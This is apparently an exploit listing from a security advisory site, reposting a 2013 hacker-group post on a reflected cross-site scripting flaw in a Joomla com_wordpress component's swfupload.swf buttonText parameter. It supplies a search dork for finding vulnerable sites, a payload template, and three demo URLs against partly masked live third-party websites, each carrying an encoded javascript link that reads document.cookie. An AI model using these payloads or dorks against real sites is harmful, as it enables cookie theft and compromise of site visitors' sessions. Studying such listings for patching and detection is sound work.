Joomla Component com_wordpress XSS Vulnerability

2013.03.22
Credit: The Black Devils
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: inurl:com_wordpress

# Title : joomla Component com_wordpress XSS Vulnerability # Date: 2013-03-15 # Software Link: [ N / A ] # Credit: This Bug was founded by Asesino04 "The Black Devils" # Tested on: Windows XP SP2 # Category: [webapps] # Dork : inurl:com_wordpress ----------- http://127.0.0.1/path/components/com_wordpress/path/wp-includes/js/swfupload/swfupload.swf?buttonText=[ XSS ] # Demo : ftp://216.1XXX.150/www.e3.com/components/com_wordpress/wp/wp-includes/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E http://www.iiXXX.com/~joomla/components/com_wordpress/wp/wp-includes/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E http://www.tsXXcrack.com/contests/components/com_wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E ----------- Thanks To : | r0073r | KedAns-Dz | D4RKCR1PT3R | Keystr0ke | x3o-1337 | Èlite TrØjan | sH3LL05Dz | Ana Eve | DZ Combattant | Muhammad Talha Khan | r4dc0re | SeeMe CrosS | Zikou-16 | DaOne | Angel Injection | NuxbieCyber | Tibit | Sammy FORGIT | D4NB4R beBoss | LORDOFDARKNES | All Dz hackerz ----------- Contact: # Fane Page : www.facebook.com/Th3.Black.D3Vils # Youtube : www.youtube.com/user/Th3BlackDevils # Facebook : www.facebook.com/DevilsDz # Email : mr.k4rizma@gmail.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top